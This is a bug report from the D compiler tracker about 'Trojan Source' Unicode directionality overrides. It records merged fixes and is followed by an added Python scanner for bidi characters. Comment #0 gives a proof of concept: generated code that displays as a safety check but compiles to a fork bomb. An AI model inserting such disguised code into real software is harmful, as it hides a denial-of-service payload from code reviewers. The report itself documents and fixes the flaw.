Bug 22495 – SECURITY: unicode directionality overrides should be rejected

Status
RESOLVED
Resolution
FIXED
Severity
blocker
Priority
P1
Component
dmd
Product
D
Version
D2
Platform
All
OS
All
Creation time
2021-11-08T21:12:02Z
Last change time
2023-01-10T18:08:59Z
Keywords
accepts-invalid
Assigned to
No Owner
Creator
Ate Eskola
See also
https://issues.dlang.org/show_bug.cgi?id=22465

Comments

Comment #0 by Ajieskola — 2021-11-08T21:12:02Z
Read: https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html

Demonstration (for Unix systems) that the vulnerability affects the D compilers:
------------------
import std;

auto exploit = "import core.sys.posix.unistd;
enum mode = \"safe\";
@safe void main(){
    if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\")
        while(fork()){};
}";

@safe void main()
{
    File("payload.d", "w").writeln(exploit);
}
------------------
When run, this file generates a program that looks like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
    if (mode != "safe") // Check if safe ( disabled )
        while(fork()){};
}
----------
But compiles like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
    if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066")
        while(fork()){};
}
----------
Comment #1 by ibuclaw — 2021-11-15T12:46:11Z
Posted pull request on the github repo with more appropriate tests here: https://github.com/nickboucher/trojan-source/pull/16 Also noted what works, what doesn't.
Comment #2 by dlang-bot — 2022-10-13T16:10:22Z
@dukc updated dlang/dmd pull request #14538 "Fix security issue 22495" mentioning this issue:

- Fix security issue 22495 - unicode bidirectional controls should be forbidden.

https://github.com/dlang/dmd/pull/14538
Comment #3 by dlang-bot — 2022-10-28T22:05:44Z
dlang/dmd pull request #14538 "Fix security issue 22495" was merged into stable:

- dadb7fd66e9c434ccec733b40cbd5e0704ecde2a by Ate Eskola:
  Fix security issue 22495 - unicode bidirectional controls should be forbidden.

https://github.com/dlang/dmd/pull/14538
Comment #4 by dlang-bot — 2022-11-01T11:40:36Z
@ibuclaw created dlang/dmd pull request #14609 "merge stable" mentioning this issue:

- Fix security issue 22495 (#14538)
  Fix security issue 22495 - unicode bidirectional controls should be forbidden.

https://github.com/dlang/dmd/pull/14609
Comment #5 by dlang-bot — 2022-11-01T16:30:35Z
dlang/dmd pull request #14609 "merge stable" was merged into master:

- a658f02da91b50fe73bb832c793a273abfd93aa9 by Ate Eskola:
  Fix security issue 22495 (#14538)
  Fix security issue 22495 - unicode bidirectional controls should be forbidden.

https://github.com/dlang/dmd/pull/14609
Comment #6 by ibuclaw — 2023-01-10T18:08:59Z
This was fixed.
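
Added example (not part of the bug thread and not dmd's fix code): a review-side scanner that reports the bidirectional control characters used in comment #0 and prints the flagged line in logical order, matching the "compiles like" view. The function names, the `include_escapes` option and the sample input are assumptions made for this illustration.

```python
import re
import unicodedata

# The nine explicit bidi formatting characters: embeddings, overrides,
# isolates and their terminators (U+202A..U+202E, U+2066..U+2069).
BIDI_CONTROLS = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")

# Escaped spellings (\u202E, \U0000202E) that a generator program, like the
# one in comment #0, can use to write the raw characters into another file.
ESCAPED = re.compile(r"\\(?:u|U0000)(202[A-Ea-e]|206[6-9])")


def _label(ch):
    return f"U+{ord(ch):04X} {unicodedata.name(ch)}"


def find_bidi(source, include_escapes=False):
    """Return (line, column, 'U+XXXX NAME', kind) for every bidi control."""
    findings = []
    for lineno, line in enumerate(source.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append((lineno, col, _label(ch), "raw"))
        if include_escapes:
            for m in ESCAPED.finditer(line):
                ch = chr(int(m.group(1), 16))
                findings.append((lineno, m.start() + 1, _label(ch), "escaped"))
    return findings


def reveal(line):
    """Show a line in logical order, each control as a visible \\uXXXX escape."""
    return "".join(f"\\u{ord(c):04X}" if c in BIDI_CONTROLS else c for c in line)


# Constructed sample: the payload line from comment #0 with the raw
# characters in place, as they would appear in the generated payload.d.
PAYLOAD_LINE = 'if (mode != "safe\u202e \u2066) // Check if safe ( disabled\u2069\u2066")'
SAMPLE = 'enum mode = "safe";\n' + PAYLOAD_LINE + "\n"

if __name__ == "__main__":
    for lineno, col, label, kind in find_bidi(SAMPLE):
        print(f"payload.d:{lineno}:{col}: {kind} bidi control {label}")
    print(reveal(PAYLOAD_LINE))
```

With `include_escapes=True` the scanner also flags the generator file itself, which contains only the ASCII escape spellings and would otherwise pass a raw-character check.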